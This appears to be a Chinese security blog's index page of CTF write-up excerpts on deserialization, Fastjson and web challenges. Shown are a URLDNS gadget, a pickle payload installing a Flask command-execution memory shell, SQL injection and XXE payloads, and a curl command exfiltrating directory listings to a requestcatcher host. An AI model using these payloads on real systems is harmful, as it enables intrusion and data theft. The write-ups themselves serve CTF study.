MoonlitSyntax - 月光下的轻语

离开贴吧

发表于2024-06-15 | 日常

特大好消息,头不痛了

有点难受

发表于2024-06-14 | 日常

bee3e297b84533bd03260dd56db1e6193a27429ef5d626f849e01a8c7fb637c6975b7a0626acc664778bb7501ee89ec79ee46703ff4d194dee5c8442e7cd030b772ccd629d7206af8736e001f9224fb5d58ff1c236988ff4424f50ddd4e606d65ae144b7efc071e85c066537a9292709731094b0a6ec7b91704fff63cc0e74511bf0a62b481ab87cbc034ef29e3ce17e2a971899dde1403112b9adce5b411cf39f441ab38cb6c2c075ac628f050be3c49c5c64be1610615d64410a8f148b4f61c478f3f9a5aac382fc1479cfa3d714546b05af40849e105d93c09ba14bf190a04f3105c7445d8263ecbe983fa42074ae380a796030a114872 ...

发表于2024-06-08 | 日常

复习一下反序列化 cc1-cc7

复习一下反序列化 cc1-cc7

发表于2024-06-07

URLDNS hashmap:readObject readObject:putVal putVal:hash hash:URL.hashcode == -1 getHostAddress => DNS查询 HashMap map = new HashMap(); URL url = new URL("http://dyro20rs.dnslog.pw"); Class clas = Class.forName("java.net.URL"); Field field = clas.getDeclaredField("hashCode"); field.setAccessible(true); field.set(url,-1); map.put(url,"2333"); field.set(url,-1); cc2 反序列化的时候是触发queue的readObject : heapify()即堆排序函数触发heapify()里的siftDownUsingCom ...

Fastjson

发表于2024-06-07

Fastjson提供了两个主要接口来分别实现对于Java Object的序列化和反序列化操作。 JSON.toJSONString JSON.parseObject/JSON.parse 一个例子 //一个简单的Java Bean//使用Alt+Insert快捷键快速生成setter和getter public class Person { public String name; public int age; public String getName() { return name; } public void setName(String name) { this.name = name; } public int getAge() { return age; } public void setAge(int age) { this.age = age; } ...

hexo魔改

发表于2024-06-07 | IT日常

太无语了哥们

发表于2024-06-07

flask import osimport pickleimport base64class A(): def __reduce__(self): return (eval,("__import__(\"sys\").modules['__main__'].__dict__['app'].before_request_funcs.setdefault(None, []).append(lambda :__import__('os').popen(request.args.get('gxngxngxn')).read())",))a = A()b = pickle.dumps(a)print(base64.b64encode(b)) import osimport pickleimport base64class A(): def __reduce__(self): return (eval,("__import__(& ...

login system

发表于2024-06-07 | Writeup

很有意思的一道题目官方给的poc 在poc之前先安装pycurl export LDFLAGS="-L/opt/homebrew/opt/openssl/lib"export CPPFLAGS="-I/opt/homebrew/opt/openssl/include"env PYCURL_CURL_CONFIG=/opt/homebrew/bin/curl-config pip install pycurl --no-cache-dir import requestsimport socketimport pycurlimport osimport jsonfrom io import BytesIOfrom argparse import ArgumentParserparser = ArgumentParser()parser.add_argument("target", nargs="?", default="http://localhost:10150/")parser.add ...

忘记了密码

忘记了密码

发表于2024-06-07 | Writeup

sql import requestsurl = "https://whats-my-password-web.chal.irisc.tf/api/login"data = {"username":"skar","password":"\" OR (username = \"skat\" AND password LIKE \"%\") OR \""}response = requests.post(url, json=data)print(response.text + "\n" + str(response.status_code)) 提前闭合就成了,%做通配符

LameNote

发表于2024-06-07 | Writeup

好好好看不懂 nodejs,我恨收藏一个好的网站 Request Catcher — record HTTP requests, webhooks, API calls curl -X POST -d "$(ls /tmp)" https://asddsa.requestcatcher.com/test

Just Go Around

发表于2024-06-07 | Writeup

一个query 一个post 一个accept 第三个路由下有个xml外部实体注入,我测你妈 %3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%20standalone%3d%22no%22%3f%3e%3c!DOCTYPE%20post%20%5b%3c!ENTITY%20hacker%20SYSTEM%20%22file%3a%2f%2f%2f%22%3e%5d%3e%3cpost%20author%3d%22CTF%20Participant%22%20id%3d%220%22%20title%3d%22234%22%3e%3cmessage%3e%26hacker%3b%3c%2fmessage%3e%3c%2fpost%3e 也就是 <?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE post [<!ENTITY hacker SYSTEM "f ...

easy-java

发表于2024-06-07 | Writeup

不是,他说easy你还真信了啊